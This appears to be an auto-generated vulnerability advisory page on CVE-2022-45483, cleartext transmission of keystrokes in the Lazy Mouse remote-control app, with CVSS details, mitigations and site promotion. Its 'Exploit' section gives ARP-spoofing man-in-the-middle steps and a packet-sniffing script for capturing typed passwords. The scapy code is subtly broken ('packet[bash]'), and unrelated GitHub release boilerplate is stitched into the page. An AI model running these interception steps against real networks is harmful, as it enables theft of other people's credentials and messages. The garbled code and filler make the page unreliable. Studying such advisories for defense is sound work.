Lazy Mouse, Cleartext Transmission, CVE-2022-45483 (Medium) -DC-Oct2026-2731

Listen to this Post

The vulnerability identified as CVE-2022-45483 affects Lazy Mouse, a remote control application that allows a smartphone to act as a wireless mouse and keyboard for a computer. The core issue lies in the application’s failure to encrypt data transmitted between the server (the computer running the Lazy Mouse software) and the connected device (the mobile application). This flaw is classified as a Cleartext Transmission of Sensitive Information (CWE-319). When a user interacts with the Lazy Mouse application, every command—such as mouse movements, clicks, and, most critically, keystrokes—is sent over the local network in an unencrypted, plaintext format. An attacker who has positioned themselves in a man-in-the-middle (MITM) attack scenario, for example, by being on the same insecure Wi-Fi network, can passively intercept this network traffic. Once intercepted, the attacker can view all the transmitted data in clear, readable text without needing to break any encryption. This allows the attacker to capture sensitive information, including passwords, personal messages, and other confidential data typed by the user. The vulnerability has a CVSS 3.1 base score of 5.9, which is rated as Medium severity. The attack vector is considered Network (AV:N), but with High attack complexity (AC:H) because it requires the attacker to be in a specific MITM position. No privileges are required (PR:N) and no user interaction (UI:N) is needed for the attack to succeed once the position is established. The impact on confidentiality is High, as all transmitted data is exposed, but there is no impact on integrity or availability. The vulnerability affects Lazy Mouse versions 2.0.1 and prior. The assigning CNA is Synopsys, and the CVE was published on December 2, 2022.

DailyCVE Form:

Platform: Lazy Mouse
Version: <= 2.0.1
Vulnerability : Cleartext Transmission
Severity: Medium
date: 2022-12-02

Prediction: 2022-12-09

What Undercode Say:

Analytics

Check if Lazy Mouse is running and listening on a port
netstat -tulnp | grep -i "lazymouse"
Capture network traffic on the local interface (requires root)
sudo tcpdump -i any -A -s 0 port <lazymouse_port>
Filter for HTTP POST requests that may contain keystrokes
sudo tcpdump -i any -A -s 0 port <lazymouse_port> | grep -i "POST"
Python script to sniff and print cleartext data from Lazy Mouse traffic
from scapy.all import sniff, TCP, Raw
def process_packet(packet):
if packet.haslayer(Raw):
payload = packet[bash].load
try:
print(payload.decode('utf-8', errors='ignore'))
except:
pass
Sniff on the interface where Lazy Mouse traffic is present
sniff(iface="eth0", filter="tcp port <lazymouse_port>", prn=process_packet)

Exploit: (Educational Purposes!)

Step 1: Enable IP forwarding to act as a router
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2: Use arpspoof to poison ARP cache of the victim (computer) and the gateway
Replace <victim_ip>, <gateway_ip>, and <interface> with actual values
arpspoof -i <interface> -t <victim_ip> <gateway_ip> &
arpspoof -i <interface> -t <gateway_ip> <victim_ip> &
Step 3: Capture the traffic using tcpdump and save to a file
tcpdump -i <interface> -w captured_traffic.pcap port <lazymouse_port>
Step 4: Analyze the captured traffic for cleartext keystrokes
strings captured_traffic.pcap | grep -E "password|user|login|key"

Protection:

Ensure Lazy Mouse is not exposed on untrusted networks
Use a firewall to restrict access to the Lazy Mouse port only from trusted IPs
sudo iptables -A INPUT -p tcp --dport <lazymouse_port> -s <trusted_ip> -j ACCEPT
sudo iptables -A INPUT -p tcp --dport <lazymouse_port> -j DROP
Prefer using a VPN when operating Lazy Mouse over untrusted networks
(Example: connect to a WireGuard VPN before using the application)
sudo wg-quick up wg0

Impact:

The primary impact is the disclosure of sensitive information.
An attacker can capture:
- Passwords typed into any application
- Credit card numbers entered on websites
- Private messages and emails
- Any other data entered via the keyboard
Example of a simulated log that an attacker might obtain:
[2026-10-05 12:34:56] KEYSTROKE: p
[2026-10-05 12:34:57] KEYSTROKE: a
[2026-10-05 12:34:58] KEYSTROKE: s
[2026-10-05 12:34:59] KEYSTROKE: s
[2026-10-05 12:35:00] KEYSTROKE: w
[2026-10-05 12:35:01] KEYSTROKE: o
[2026-10-05 12:35:02] KEYSTROKE: r
[2026-10-05 12:35:03] KEYSTROKE: d
[2026-10-05 12:35:04] KEYSTROKE: <ENTER>

Releases: sim0nx/euvdlist

Releases · sim0nx/euvdlist

There aren’t any releases here

You can create a release to package software, along with release notes and links to binary files, for other people to use. Learn more about releases in our docs.
You can create a release to package software, along with release notes and links to binary files, for other people to use. Learn more about releases in our docs.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top